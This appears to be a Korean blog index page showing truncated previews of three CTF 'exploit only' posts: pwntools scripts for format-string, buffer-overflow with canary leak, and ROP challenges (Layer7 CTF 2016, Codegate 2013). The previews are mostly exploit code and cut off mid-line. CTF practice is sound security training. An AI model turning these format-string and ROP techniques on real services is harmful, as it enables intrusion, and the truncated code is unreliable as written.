2016 Layer7 CTF easy_fsb exploit only FSB에 약점을 가지고 있던 나로써는 힘들게 푼 문제.. 바보같이 %hn이 2byte를 써 준다는 걸 모르고 삽질 .. %s로 하면 주소를 leak 시킬 수 있다는 걸 모르고 삽질 .. 같은 팀원인 민정이의 도움을 받았다. from pwn import * conn = remote('prob.layer7.kr', 10002) payload = "%75$x\n" conn.send(payload) libc_start = int(conn.recv(8),16) - 247 print "libc_start : " + hex(libc_start) system_libc = 0x0003A920 - 0x00018540system_addr = system_libc + libc_startprintf_got = 0x0804A01.. 더보기 2016 Layer7 CTF easy_bof exploit only from pwn import * conn = remote('prob.layer7.kr', 10003) payload = "2147483650\n"payload += "%43$lx%41$lx" conn.send(payload) canary = conn.recv(16)start = conn.recv(12) print "canary : " + canaryprint "start : " + start base_addr = int(start,16) - 0x7e0 printf_plt = base_addr + 0x00000000000007A0fflush_got = base_addr + 0x0000000000200FD8 puts_plt = base_addr + 0x0000000000000790puts_got = base.. 더보기 codegate 2013 vuln200 from rop exploit only from pwn import * elf = ELF('/usr/local/src/pwn/vuln200/vuln200') recv_plt,send_plt = elf.plt['recv'], elf.plt['send']recv_got,send_got = elf.got['recv'], elf.got['send'] ppppr = 0x080493ACvuln = 0x08048EEB conn = remote("localhost", 7777) bss = 0x0804B0E0 payload = "write"payload += "A" * 236 payload += "AAAA" payload += p32(send_plt) # retpayload += p32(ppppr) # argv1payload += p32(4) # fdpayl.. 더보기 이전 1 2 3 4 5 6 ··· 19 다음 목록 더보기